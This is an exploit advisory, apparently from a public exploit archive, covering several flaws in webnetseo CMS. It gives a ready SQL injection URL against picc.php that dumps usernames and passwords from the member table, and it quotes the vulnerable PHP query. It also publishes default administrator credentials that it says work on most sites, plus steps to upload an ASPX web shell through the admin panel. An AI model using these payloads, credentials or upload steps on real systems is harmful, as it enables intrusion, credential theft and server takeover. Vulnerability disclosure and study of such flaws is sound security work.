###########################################################
# Exploit Title : webnetseo CMS Multiple Vulnerabilities
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage: webnetseo.net
# Date : 2017 07 May
# Category : WebApp
# MY HOME : Ashiyane.org
# CWE : CWE-89 - CWE-276 And ...
# Video : https://www.youtube.com/watch?v=dZLDPYJeLSw
###########################################################
webnetseo CMS Multiple Vulnerabilities
1-SQL INJECTION
2-Default Account
3-Upload shell - ASPX
Research by Ashiyane Digital Security Team
###########################################################
1-SQL INJECTION
Some sql Vulnerability location
/picc.php?id=
Localhost://picc.php?id=-[inputSQL]+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%20from+member--+/
source Vulnerability
files : Picc.php
		$id=$_GET["id"];
		$id2=$_GET["id2"];
		$id3=$_GET["id3"];
	$strQuery = "SELECT * FROM pic where id > '$id' && class_id='$id3' order by id asc";
        $db->query($strQuery);
        if($db->next_record()){
		echo '<a href="picc.php?id='.$db->f("id").'&id3='.f("class_id").'" style="font-size:12px; font-weight:normal; " >'.$db->f("title").'</a>';
		}else{
		echo "?";
		}
		?></td>
                              </tr>
###########################################################
2-Default Account
90% sites Default Account Default Account
USER : yxy746380
PASS : 746380
###########################################################
3-Upload shell - ASPX
go to  TARGET.COM/admin/pic.php?id=2
upload ASPX And ASP shell
shell location : TARGET.COM/images/upload_file/[RandonName.aspx]
finishd
################################################ 
# Discovered By : Hassan Shakeri 
# Twitter : @ShakeriHassan - Fb.com/General.BlackHat - Me@Seravo.ir 
###########################################################